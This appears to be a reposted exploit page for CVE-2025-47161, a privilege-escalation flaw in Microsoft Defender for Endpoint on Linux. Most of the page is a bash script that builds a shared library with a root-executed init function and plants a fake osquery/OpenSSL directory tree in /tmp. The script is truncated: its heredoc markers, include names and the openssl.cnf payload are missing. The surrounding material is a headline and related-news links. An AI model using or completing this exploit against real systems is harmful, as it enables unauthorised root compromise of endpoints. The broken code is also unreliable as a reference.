Hacking

Microsoft Defender for Endpoint (MDE) – Elevation of Privilege

Author5 hours ago02 mins

#!/bin/bash
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link:
https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008  20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003  30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001   30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000  30.124102.0000.0
#
# Vendor Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#
echo "MDE Version: $(mdatp version)"

# stage
cat >mde-exp.c<
#include 
#include 
#include 

void woot(){
    // for manual testing
    if(isatty(STDERR_FILENO)) {
        fprintf(stderr,"Woot!\n");
    }
    system("ps -ef > /woot.txt");
    sleep(3000000);
}

EOF

# build exploit
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/

cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
<

Leave a Reply Cancel reply

Related News

Discourse 3.2.x – Anonymous Cache Poisoning

Author1 hour ago 0

Microsoft Outlook – Remote Code Execution (RCE)

Author2 hours ago 0

Microsoft Patch Tuesday, July 2025

Author4 hours ago 0

Microsoft and Adobe Patch Tuesday, July 2025 Security Update Review

Author5 hours ago 0